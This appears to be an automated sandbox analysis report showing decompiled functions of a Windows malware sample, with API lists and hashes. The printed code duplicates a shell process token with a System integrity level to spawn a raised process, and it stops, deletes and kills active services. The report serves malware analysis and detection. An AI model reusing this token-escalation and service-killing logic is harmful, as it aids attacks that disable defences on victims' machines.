            0x00000000
            0x009b595a
            0x009b593b
            0x009b591a
            0x009b58fd
            0x009b593d
            0x009b593e
            0x00000000

            Memory Dump Source
            • Source File: 00000000.00000002.573809240.00000000009B1000.00000020.00020000.sdmp, Offset: 009B0000, based on PE: true
            • Associated: 00000000.00000002.573798858.00000000009B0000.00000002.00020000.sdmp Download File
            • Associated: 00000000.00000002.573820908.00000000009BD000.00000002.00020000.sdmp Download File
            • Associated: 00000000.00000002.573830437.00000000009C0000.00000004.00020000.sdmp Download File
            • Associated: 00000000.00000002.573838962.00000000009C3000.00000008.00020000.sdmp Download File
            • Associated: 00000000.00000002.573853514.00000000009D0000.00000002.00020000.sdmp Download File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_9b0000_Sample_5fba9b06c7da400016eb6275.jbxd
            Yara matches
            Similarity
            • API ID: time$Time$BeginPeriodSleep
            • String ID:
            • API String ID: 4118631919-0
            • Opcode ID: fc29b22b782b8560c203740e77577da81cb83bbd114b6084b10493fc8158ca25
            • Instruction ID: 2b08933de68568a7ecdccdb44ccf12448b09c50fbb00283c68c24964705cb044
            • Opcode Fuzzy Hash: fc29b22b782b8560c203740e77577da81cb83bbd114b6084b10493fc8158ca25
            • Instruction Fuzzy Hash: 08115B71E10B65DBAF1C9F7C4A907DDBBEADEC5B70B5B4769E824E3290E5318C048280
            Uniqueness

            Uniqueness Score: -1.00%

            Function 009B4C25, Relevance: .0, Instructions: 41COMMON
            Download Yara Rule
            C-Code - Quality: 62%
            			E009B4C25(intOrPtr __edx, intOrPtr _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				char _v28;
				intOrPtr _t13;
				intOrPtr* _t17;
				intOrPtr* _t24;

				_t13 = 0;
				_v8 = 0;
				_v12 = _a4;
				do {
					_push(_t17);
					asm("cpuid");
					_t24 = _t17;
					_t17 =  &_v28;
					 *_t17 = _t13 + 0x80000002;
					 *((intOrPtr*)(_t17 + 4)) = _t24;
					_t13 = _v8 + 1;
					 *((intOrPtr*)(_t17 + 8)) = 0;
					 *((intOrPtr*)(_t17 + 0xc)) = __edx;
					_v8 = _t13;
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					_v12 = _v12 + 0x10;
				} while (_t13 < 3);
				return _a4;
			}









            0x009b4c31
            0x009b4c33
            0x009b4c36
            0x009b4c39
            0x009b4c40
            0x009b4c41
            0x009b4c43
            0x009b4c46
            0x009b4c49
            0x009b4c4e
            0x009b4c51
            0x009b4c52
            0x009b4c57
            0x009b4c5a
            0x009b4c5d
            0x009b4c5e
            0x009b4c5f
            0x009b4c60
            0x009b4c67
            0x009b4c6a
            0x009b4c78

            Memory Dump Source
            • Source File: 00000000.00000002.573809240.00000000009B1000.00000020.00020000.sdmp, Offset: 009B0000, based on PE: true
            • Associated: 00000000.00000002.573798858.00000000009B0000.00000002.00020000.sdmp Download File
            • Associated: 00000000.00000002.573820908.00000000009BD000.00000002.00020000.sdmp Download File
            • Associated: 00000000.00000002.573830437.00000000009C0000.00000004.00020000.sdmp Download File
            • Associated: 00000000.00000002.573838962.00000000009C3000.00000008.00020000.sdmp Download File
            • Associated: 00000000.00000002.573853514.00000000009D0000.00000002.00020000.sdmp Download File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_9b0000_Sample_5fba9b06c7da400016eb6275.jbxd
            Yara matches
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 47c376b581d24c7d1e1a0f35ff1822e68f57d00c0a892bdfc065d503b3469f08
            • Instruction ID: 27e617986ca5d35448a9a27dd2a2979f6a4811aa2da2b353f425bed14302d43c
            • Opcode Fuzzy Hash: 47c376b581d24c7d1e1a0f35ff1822e68f57d00c0a892bdfc065d503b3469f08
            • Instruction Fuzzy Hash: A5F0FFB1901218AF8B45CF5DD88559EFBF5EF49264F6581AAE808EB301D2719A418B90
            Uniqueness

            Uniqueness Score: -1.00%

            Function 009B5408, Relevance: .0, Instructions: 6COMMON
            Download Yara Rule
            C-Code - Quality: 100%
            			E009B5408() {

				return ( *( *[fs:0x30] + 0xa4) & 0x000000ff) << 0x00000008 |  *( *[fs:0x30] + 0xa8) & 0x000000ff;
			}



            0x009b5424

            Memory Dump Source
            • Source File: 00000000.00000002.573809240.00000000009B1000.00000020.00020000.sdmp, Offset: 009B0000, based on PE: true
            • Associated: 00000000.00000002.573798858.00000000009B0000.00000002.00020000.sdmp Download File
            • Associated: 00000000.00000002.573820908.00000000009BD000.00000002.00020000.sdmp Download File
            • Associated: 00000000.00000002.573830437.00000000009C0000.00000004.00020000.sdmp Download File
            • Associated: 00000000.00000002.573838962.00000000009C3000.00000008.00020000.sdmp Download File
            • Associated: 00000000.00000002.573853514.00000000009D0000.00000002.00020000.sdmp Download File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_9b0000_Sample_5fba9b06c7da400016eb6275.jbxd
            Yara matches
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 509f6a94fdf042510e336dd1cc9cd65acd2f16b80682f34016c6142793c3d862
            • Instruction ID: 2f92208e2cd7eb6c465aa2c1d9d9ad2e0d5e4d52fdcf87f58a77acdaf95c176a
            • Opcode Fuzzy Hash: 509f6a94fdf042510e336dd1cc9cd65acd2f16b80682f34016c6142793c3d862
            • Instruction Fuzzy Hash: 15B092682066D149C396621582B83B07FA0EB83556F2800FD94EB0E883855E021BDB11
            Uniqueness

            Uniqueness Score: -1.00%

            Function 009B5083, Relevance: .0, Instructions: 2COMMON
            Download Yara Rule
            C-Code - Quality: 100%
            			E009B5083() {

				return  *[fs:0x30];
			}



            0x009b5089

            Memory Dump Source
            • Source File: 00000000.00000002.573809240.00000000009B1000.00000020.00020000.sdmp, Offset: 009B0000, based on PE: true
            • Associated: 00000000.00000002.573798858.00000000009B0000.00000002.00020000.sdmp Download File
            • Associated: 00000000.00000002.573820908.00000000009BD000.00000002.00020000.sdmp Download File
            • Associated: 00000000.00000002.573830437.00000000009C0000.00000004.00020000.sdmp Download File
            • Associated: 00000000.00000002.573838962.00000000009C3000.00000008.00020000.sdmp Download File
            • Associated: 00000000.00000002.573853514.00000000009D0000.00000002.00020000.sdmp Download File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_9b0000_Sample_5fba9b06c7da400016eb6275.jbxd
            Yara matches
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 6cae658f33ca92bcc76ffcd72798f6487763aeebc788fd534dd3d52e563a93f0
            • Instruction ID: 25aae2582423029eb19f4489c776d3d70638aac6ce1da4afce0c8a8e650509f3
            • Opcode Fuzzy Hash: 6cae658f33ca92bcc76ffcd72798f6487763aeebc788fd534dd3d52e563a93f0
            • Instruction Fuzzy Hash:
            Uniqueness

            Uniqueness Score: -1.00%

            Function 009B41C3, Relevance: 31.7, APIs: 15, Strings: 3, Instructions: 158threadCOMMON
            Download Yara Rule
            C-Code - Quality: 48%
            			E009B41C3() {
				long _v8;
				void* _v12;
				long _v16;
				void* _v20;
				long _v24;
				void _v28;
				char _v32;
				void* _v44;
				long _v48;
				void* _v62;
				void _v88;
				char _v152;
				char _v156;
				signed int _t38;
				signed int _t43;
				int _t46;
				int _t48;
				void* _t51;
				int _t58;
				void* _t61;
				WCHAR* _t77;
				signed int _t78;
				void* _t90;
				void* _t92;
				void* _t93;

				_t78 = 6;
				memcpy( &_v88, L"S-1-16-16384", _t78 << 2);
				_v8 = 0;
				_v28 = 0;
				asm("movsw");
				_v24 = 0;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosw");
				 *0x9c115c();
				GetWindowThreadProcessId(0,  &_v16);
				if(_v16 != 0) {
					_t38 = E009B5408();
					__eflags = _t38 - 0x600;
					asm("sbb eax, eax");
					_t92 = OpenProcess((_t38 & 0xfffff400) + 0x1000, 0, _v16);
					__eflags = _t92;
					if(_t92 == 0) {
						goto L1;
					}
					_t43 = E009B5408();
					__eflags = _t43 - 0x600;
					asm("sbb eax, eax");
					_t46 = OpenProcessToken(_t92, (_t43 & 0xfe1fffff) + 0x2000000,  &_v20);
					__eflags = _t46;
					if(_t46 == 0) {
						goto L1;
					}
					_t48 = DuplicateTokenEx(_v20, 0, 0, 2, 1,  &_v12);
					__eflags = _t48;
					if(_t48 == 0) {
						goto L1;
					}
					_t51 =  *0x9c118c( &_v88,  &_v8);
					__eflags = _t51;
					if(_t51 == 0) {
						goto L1;
					}
					_t93 = _v8;
					_v48 = 0;
					asm("stosd");
					_v24 = 0x20;
					asm("stosd");
					_v28 = _t93;
					asm("stosd");
					E009B49D3( &_v152, 0, 0x40);
					_v156 = 0x44;
					_t58 = SetTokenInformation(_v12, 0x19,  &_v28, GetLengthSid(_t93) + 8);
					__eflags = _t58;
					if(_t58 == 0) {
						goto L1;
					}
					_v32 = 0;
					_t77 = E009B4F8D(0,  &_v32);
					PathQuoteSpacesW(_t77);
					_t61 = E009B5359();
					_t90 = E009B494C(0x1f40);
					E009B6116(__eflags, _t90, _t77);
					E009B6116(__eflags, _t90, " ");
					E009B6116(__eflags, _t90, _t61);
					 *0x9c1220(_v12, 2, _t77, _t90, 0, 0, 0,  &_v156,  &_v48);
					__eflags = 0;
					if(0 != 0) {
						CloseHandle(_v48);
						CloseHandle(_v44);
					}
					LocalFree(_v8);
					CloseHandle(_v12);
					CloseHandle(_v20);
					return 0;
				}
				L1:
				return 0;
			}




























            0x009b41d1
            0x009b41da
            0x009b41e0
            0x009b41e3
            0x009b41e6
            0x009b41eb
            0x009b41ee
            0x009b41ef
            0x009b41f0
            0x009b41f1
            0x009b41f3
            0x009b41fe
            0x009b4207
            0x009b4210
            0x009b421d
            0x009b4221
            0x009b4234
            0x009b4236
            0x009b4238
            0x00000000
            0x00000000
            0x009b423a
            0x009b423f
            0x009b4246
            0x009b4254
            0x009b425a
            0x009b425c
            0x00000000
            0x00000000
            0x009b426b
            0x009b4271
            0x009b4273
            0x00000000
            0x00000000
            0x009b427d
            0x009b4283
            0x009b4285
            0x00000000
            0x00000000
            0x009b4287
            0x009b428f
            0x009b4292
            0x009b4296
            0x009b429d
            0x009b429e
            0x009b42a1
            0x009b42a9
            0x009b42b1
            0x009b42cf
            0x009b42d5
            0x009b42d7
            0x00000000
            0x00000000
            0x009b42e0
            0x009b42ec
            0x009b42ef
            0x009b42f5
            0x009b4306
            0x009b430a
            0x009b4315
            0x009b431c
            0x009b433b
            0x009b4343
            0x009b4345
            0x009b434a
            0x009b4353
            0x009b4353
            0x009b435c
            0x009b4365
            0x009b436e
            0x00000000
            0x009b4374
            0x009b4209
            0x00000000

            APIs
            • GetShellWindow.USER32 ref: 009B41F3
            • GetWindowThreadProcessId.USER32(00000000,?), ref: 009B41FE
            • OpenProcess.KERNEL32(-00001000,00000000,?,?,00000000), ref: 009B422E
            • OpenProcessToken.ADVAPI32(00000000,-02000000,?,?,00000000), ref: 009B4254
            • DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?,?,00000000), ref: 009B426B
            • ConvertStringSidToSidW.ADVAPI32(?,?), ref: 009B427D
            • GetLengthSid.ADVAPI32(?,?,00000000), ref: 009B42BC
            • SetTokenInformation.ADVAPI32(?,00000019,?,-00000008,?,00000000), ref: 009B42CF
            • PathQuoteSpacesW.SHLWAPI(00000000,?,00000000), ref: 009B42EF
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.573809240.00000000009B1000.00000020.00020000.sdmp, Offset: 009B0000, based on PE: true
            • Associated: 00000000.00000002.573798858.00000000009B0000.00000002.00020000.sdmp Download File
            • Associated: 00000000.00000002.573820908.00000000009BD000.00000002.00020000.sdmp Download File
            • Associated: 00000000.00000002.573830437.00000000009C0000.00000004.00020000.sdmp Download File
            • Associated: 00000000.00000002.573838962.00000000009C3000.00000008.00020000.sdmp Download File
            • Associated: 00000000.00000002.573853514.00000000009D0000.00000002.00020000.sdmp Download File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_9b0000_Sample_5fba9b06c7da400016eb6275.jbxd
            Yara matches
            Similarity
            • API ID: ProcessToken$OpenWindow$ConvertDuplicateInformationLengthPathQuoteShellSpacesStringThread
            • String ID: $D$S-1-16-16384
            • API String ID: 154903557-1080820781
            • Opcode ID: 677c08185f0477ad890c3a4f5daaf7df106f504e7bce0238b0b98c636b17db36
            • Instruction ID: 73048a82425603c3a8231564ca18f58d23d313cd58790f6c84e664308e8041ac
            • Opcode Fuzzy Hash: 677c08185f0477ad890c3a4f5daaf7df106f504e7bce0238b0b98c636b17db36
            • Instruction Fuzzy Hash: 7A518FB2D14109BFEB109FA4DD46FEFBBBCEB05750F040025F615E2152D7349945ABA4
            Uniqueness

            Uniqueness Score: -1.00%

            Function 009B5A77, Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 141serviceCOMMON
            Download Yara Rule
            C-Code - Quality: 50%
            			E009B5A77(void* __ebx, void* __ecx, void* __edx, void* __esi, void* __eflags, char _a4) {
				int _v8;
				char _v12;
				char _v16;
				char _v20;
				void _v44;
				struct _SERVICE_STATUS _v48;
				char _v116;
				char _v6796;
				void* _t25;
				void* _t26;
				long _t41;
				void* _t42;
				int _t57;
				void* _t58;
				signed int _t61;
				int _t66;
				void* _t68;
				long* _t73;
				void* _t74;
				void* _t75;

				E009BC580();
				_t66 = 0;
				E009B49D3( &_v116, 0, 0x42);
				_t75 = _t74 + 0xc;
				_t25 = E009B5408();
				_t77 = _t25 - 0x600;
				if(_t25 < 0x600 || E009B5C62(__edx, _t77) == 0) {
					L21:
					_t26 = 0;
					__eflags = 0;
					goto L22;
				} else {
					 *0x9c1de0 = OpenSCManagerW(0, L"ServicesActive", 4);
					_push( &_v116);
					_push(0);
					_push(0x9c0fec);
					if( *0x9c12b4() != 0) {
						goto L21;
					}
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_push( &_a4);
					_push(1);
					_push( *0x9c0fec);
					if( *0x9c1164() != 0) {
						goto L21;
					}
					_v12 = 0xa;
					_push( &_v16);
					_push( &_v6796);
					_push( &_v12);
					_push( &_v20);
					_push( *0x9c0fec);
					if( *0x9c10b0() != 0) {
						L20:
						 *0x9c105c( *0x9c0fec);
						CloseServiceHandle( *0x9c1de0);
						_t26 = 1;
						L22:
						return _t26;
					}
					_t57 = 0;
					_v8 = 0;
					if(_v12 <= 0) {
						goto L20;
					}
					_t73 =  &_v6796;
					do {
						_t41 = _t73[0xa3];
						if(_t41 != 3) {
							__eflags = _t41 - 0x3e8;
							if(_t41 == 0x3e8) {
								goto L19;
							}
							L15:
							_t42 = E009B4B05( *_t73);
							_pop(0);
							__eflags = _t42;
							if(_t42 != 0) {
								goto L19;
							}
							_t68 = OpenProcess(1, _t66,  *_t73);
							__eflags = _t68;
							if(_t68 != 0) {
								TerminateProcess(_t68, 0);
								E009B4BEE(_t68);
								_pop(0);
							}
							L18:
							E009B4AB8(0,  *_t73);
							_t57 = _v8;
							goto L19;
						}
						_t58 = OpenServiceW( *0x9c1de0,  &(_t73[0x83]), 0x10020);
						if(_t58 == 0) {
							goto L20;
						}
						_t61 = 6;
						_v48 = _t66;
						memset( &_v44, 0, _t61 << 2);
						_t75 = _t75 + 0xc;
						if(ControlService(_t58, 1,  &_v48) == 0) {
							_t57 = _v8;
							_t66 = 0;
							__eflags = 0;
							goto L15;
						}
						if(DeleteService(_t58) == 0) {
							goto L20;
						}
						CloseServiceHandle(_t58);
						goto L18;
						L19:
						_t57 = _t57 + 1;
						_t73 =  &(_t73[0xa7]);
						_v8 = _t57;
						_t66 = 0;
					} while (_t57 < _v12);
					goto L20;
				}
			}























            0x009b5a7f
            0x009b5a87
            0x009b5a8e
            0x009b5a93
            0x009b5a96
            0x009b5aa0
            0x009b5aa3
            0x009b5c1d
            0x009b5c1d
            0x009b5c1d
            0x00000000
            0x009b5ab6
            0x009b5ac4
            0x009b5acc
            0x009b5acd
            0x009b5ace
            0x009b5adb
            0x00000000
            0x00000000
            0x009b5ae1
            0x009b5ae2
            0x009b5ae3
            0x009b5ae4
            0x009b5ae8
            0x009b5ae9
            0x009b5aeb
            0x009b5af9
            0x00000000
            0x00000000
            0x009b5b04
            0x009b5b0b
            0x009b5b12
            0x009b5b16
            0x009b5b1a
            0x009b5b1b
            0x009b5b29
            0x009b5bfe
            0x009b5c04
            0x009b5c10
            0x009b5c19
            0x009b5c1f
            0x009b5c23
            0x009b5c23
            0x009b5b2f
            0x009b5b31
            0x009b5b37
            0x00000000
            0x00000000
            0x009b5b3d
            0x009b5b43
            0x009b5b43
            0x009b5b4c
            0x009b5ba2
            0x009b5ba7
            0x00000000
            0x00000000
            0x009b5bb0
            0x009b5bb2
            0x009b5bb7
            0x009b5bb8
            0x009b5bba
            0x00000000
            0x00000000
            0x009b5bc7
            0x009b5bc9
            0x009b5bcb
            0x009b5bd0
            0x009b5bd7
            0x009b5bdc
            0x009b5bdc
            0x009b5bdd
            0x009b5bdf
            0x009b5be4
            0x00000000
            0x009b5be7
            0x009b5b66
            0x009b5b6a
            0x00000000
            0x00000000
            0x009b5b72
            0x009b5b73
            0x009b5b7b
            0x009b5b7b
            0x009b5b8c
            0x009b5bab
            0x009b5bae
            0x009b5bae
            0x00000000
            0x009b5bae
            0x009b5b97
            0x00000000
            0x00000000
            0x009b5b9a
            0x00000000
            0x009b5be8
            0x009b5be8
            0x009b5be9
            0x009b5bf1
            0x009b5bf4
            0x009b5bf5
            0x00000000
            0x009b5b43

            APIs
              • Part of subcall function 009B5C62: VerSetConditionMask.KERNEL32(00000000,00000000,00000080,00000001,?,00000000,?), ref: 009B5CBC
              • Part of subcall function 009B5C62: VerifyVersionInfoW.KERNEL32(0000011C,00000080,00000000), ref: 009B5CCC
            • OpenSCManagerW.ADVAPI32(00000000,ServicesActive,00000004,?,009B303D,?), ref: 009B5ABE
            • OpenServiceW.ADVAPI32(?,00010020), ref: 009B5B60
            • ControlService.ADVAPI32(00000000,00000001,?), ref: 009B5B84
            • DeleteService.ADVAPI32(00000000), ref: 009B5B8F
            • CloseServiceHandle.ADVAPI32(00000000), ref: 009B5B9A
            • OpenProcess.KERNEL32(00000001,00000000,?), ref: 009B5BC1
            • TerminateProcess.KERNEL32(00000000,00000000), ref: 009B5BD0
            • CloseServiceHandle.ADVAPI32 ref: 009B5C10
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.573809240.00000000009B1000.00000020.00020000.sdmp, Offset: 009B0000, based on PE: true
            • Associated: 00000000.00000002.573798858.00000000009B0000.00000002.00020000.sdmp Download File
            • Associated: 00000000.00000002.573820908.00000000009BD000.00000002.00020000.sdmp Download File
            • Associated: 00000000.00000002.573830437.00000000009C0000.00000004.00020000.sdmp Download File
            • Associated: 00000000.00000002.573838962.00000000009C3000.00000008.00020000.sdmp Download File
            • Associated: 00000000.00000002.573853514.00000000009D0000.00000002.00020000.sdmp Download File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_9b0000_Sample_5fba9b06c7da400016eb6275.jbxd
            Yara matches
            Similarity
            • API ID: Service$Open$CloseHandleProcess$ConditionControlDeleteInfoManagerMaskTerminateVerifyVersion
            • String ID: ServicesActive
            • API String ID: 3848605446-3071072050
            • Opcode ID: 755110bd7470d83d542483e8080d214ff1453f792aed20c7f3a763f834a8cd53
            • Instruction ID: b848a09b28ee9732e04a59c7a737dcd4cd453704905938811234f6b520519df0
            • Opcode Fuzzy Hash: 755110bd7470d83d542483e8080d214ff1453f792aed20c7f3a763f834a8cd53
            • Instruction Fuzzy Hash: B541C835A14604AFEB209FA1DD84FEF7BBDEB85760F11402AF602E2152EB349941DB24
            Uniqueness

            Uniqueness Score: -1.00%

            Function 009B2D36, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 124COMMON
            Download Yara Rule
            C-Code - Quality: 93%
            			E009B2D36(intOrPtr _a4, intOrPtr _a8) {
				short _v6;
				char _v12;
				short _v14;
				char _v40;
				short _v42;
				char _v80;
				signed int _t29;
				signed int _t34;
				signed int _t40;
				WCHAR* _t53;

				if( *0x9c230c != 0) {
					return 1;
				}
				_t66 = _a8;
				if(_a8 != 0) {
					E009B60E8(_a4);
					E009B60E8(_t66);
					if( *0x9c1d98 != 0) {
						L9:
						E009B5E33(0x9c0270, 0xc36, 0xc, 0x1a,  &_v40);
						_v14 = 0;
						E009B5E33(0x9c0270, 0x4ed, 0xa, 0x26,  &_v80);
						_v42 = 0;
						if(E009B6197(_t66,  &_v40) == 0 || E009B6197(_t66,  &_v80) == 0) {
							_t29 = 1;
						} else {
							if(E009B6307(_a4,  &_v40) == 0) {
								_t34 = E009B6510(0x9c2294, _t66);
								asm("sbb eax, eax");
								_t29 =  ~_t34 + 1;
							} else {
								E009B5E33(0x9c0270, 0x9da, 6, 6,  &_v12);
								_v6 = 0;
								_t40 = E009B6307(_a4,  &_v12);
								asm("sbb eax, eax");
								_t29 =  ~( ~_t40);
							}
						}
						L15:
						L16:
						return _t29;
					}
					_t53 = L"\\\\?\\c:\\windows\\";
					if( *0x9c1d9c == 0) {
						GetWindowsDirectoryW(lstrlenW(_t53) * 2 + L"\\\\?\\c:\\windows\\", 0x104);
						PathAddBackslashW(_t53);
						E009B60E8(_t53);
						 *0x9c1d9c = 1;
					}
					_t29 = E009B6197(_t53, _a4);
					if(_t29 != 0) {
						goto L9;
					} else {
						 *0x9c1d98 = 1;
						goto L15;
					}
				}
				_t29 = 1;
				goto L16;
			}













            0x009b2d43
            0x00000000
            0x009b2d47
            0x009b2d4e
            0x009b2d53
            0x009b2d61
            0x009b2d67
            0x009b2d75
            0x009b2dd5
            0x009b2de8
            0x009b2def
            0x009b2e01
            0x009b2e08
            0x009b2e1b
            0x009b2e85
            0x009b2e2d
            0x009b2e3d
            0x009b2e75
            0x009b2e7d
            0x009b2e80
            0x009b2e3f
            0x009b2e4d
            0x009b2e54
            0x009b2e5f
            0x009b2e69
            0x009b2e6b
            0x009b2e6b
            0x009b2e3d
            0x009b2e86
            0x009b2e87
            0x00000000
            0x009b2e87
            0x009b2d7e
            0x009b2d83
            0x009b2d99
            0x009b2da0
            0x009b2da7
            0x009b2dad
            0x009b2dad
            0x009b2dbb
            0x009b2dc4
            0x00000000
            0x009b2dc6
            0x009b2dc6
            0x00000000
            0x009b2dc6
            0x009b2dc4
            0x009b2d57
            0x00000000

            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.573809240.00000000009B1000.00000020.00020000.sdmp, Offset: 009B0000, based on PE: true
            • Associated: 00000000.00000002.573798858.00000000009B0000.00000002.00020000.sdmp Download File
            • Associated: 00000000.00000002.573820908.00000000009BD000.00000002.00020000.sdmp Download File
            • Associated: 00000000.00000002.573830437.00000000009C0000.00000004.00020000.sdmp Download File
            • Associated: 00000000.00000002.573838962.00000000009C3000.00000008.00020000.sdmp Download File
            • Associated: 00000000.00000002.573853514.00000000009D0000.00000002.00020000.sdmp Download File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_9b0000_Sample_5fba9b06c7da400016eb6275.jbxd
            Yara matches
            Similarity
            • API ID:
            • String ID: \\?\c:\windows\
            • API String ID: 0-2558258126
            • Opcode ID: 7bbcc9867dc48453ba5a5055bb3953a6f750cc32dcaab7d3a886a2dbb960f2dd
            • Instruction ID: 93c5739ebe3ddb9098e57bca8dcd5733ec41c0f4c4a998b88af1e981695e85e9
            • Opcode Fuzzy Hash: 7bbcc9867dc48453ba5a5055bb3953a6f750cc32dcaab7d3a886a2dbb960f2dd
            • Instruction Fuzzy Hash: 1F310971968309BAEB20AB71EE42FEE37ACDF49770F000416F941D50C1EB79D9508760
            Uniqueness

            Uniqueness Score: -1.00%

            Function 009B4AB8, Relevance: 6.0, APIs: 4, Instructions: 28sleepCOMMON
            Download Yara Rule
            C-Code - Quality: 100%
            			E009B4AB8(void* __ecx, long _a4) {
				long _v8;
				void* _t6;
				void* _t13;

				_v8 = _v8 & 0x00000000;
				_t6 = OpenProcess(0x400, 0, _a4);
				_t13 = _t6;
				if(_t13 != 0) {
					do {
						GetExitCodeProcess(_t13,  &_v8);
						Sleep(0x3e8);
					} while (_v8 == 0x103);
					CloseHandle(_t13);
					_t6 = 1;
				}
				return _t6;
			}






            0x009b4abc
            0x009b4acb
            0x009b4ad1
            0x009b4ad5
            0x009b4ad7
            0x009b4adc
            0x009b4ae7
            0x009b4aed
            0x009b4af7
            0x009b4aff
            0x009b4aff
            0x009b4b04

            APIs
            • OpenProcess.KERNEL32(00000400,00000000,009B5BE4,?,?,?,009B5BE4), ref: 009B4ACB
            • GetExitCodeProcess.KERNEL32 ref: 009B4ADC
            • Sleep.KERNEL32(000003E8,?,?,009B5BE4), ref: 009B4AE7
            • CloseHandle.KERNEL32(00000000,?,?,009B5BE4), ref: 009B4AF7
            Memory Dump Source
            • Source File: 00000000.00000002.573809240.00000000009B1000.00000020.00020000.sdmp, Offset: 009B0000, based on PE: true
            • Associated: 00000000.00000002.573798858.00000000009B0000.00000002.00020000.sdmp Download File
            • Associated: 00000000.00000002.573820908.00000000009BD000.00000002.00020000.sdmp Download File
            • Associated: 00000000.00000002.573830437.00000000009C0000.00000004.00020000.sdmp Download File
            • Associated: 00000000.00000002.573838962.00000000009C3000.00000008.00020000.sdmp Download File
            • Associated: 00000000.00000002.573853514.00000000009D0000.00000002.00020000.sdmp Download File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_9b0000_Sample_5fba9b06c7da400016eb6275.jbxd
            Yara matches
            Similarity
            • API ID: Process$CloseCodeExitHandleOpenSleep
            • String ID:
            • API String ID: 126888380-0
            • Opcode ID: 3f3a00fac35e67eb6bf6abba80f73b543befadf1286d134cdfd1e8d374a103e3
            • Instruction ID: aa0cf552af18ffaae420544092c3ef616feab0e3f3e67aa22e21ac1cd7e5c150
            • Opcode Fuzzy Hash: 3f3a00fac35e67eb6bf6abba80f73b543befadf1286d134cdfd1e8d374a103e3
            • Instruction Fuzzy Hash: 75E02B32866218FBD711AB90DD09FED77ACDF05736F000150FA00D1041D7744A00E7E8
            Uniqueness

            Uniqueness Score: -1.00%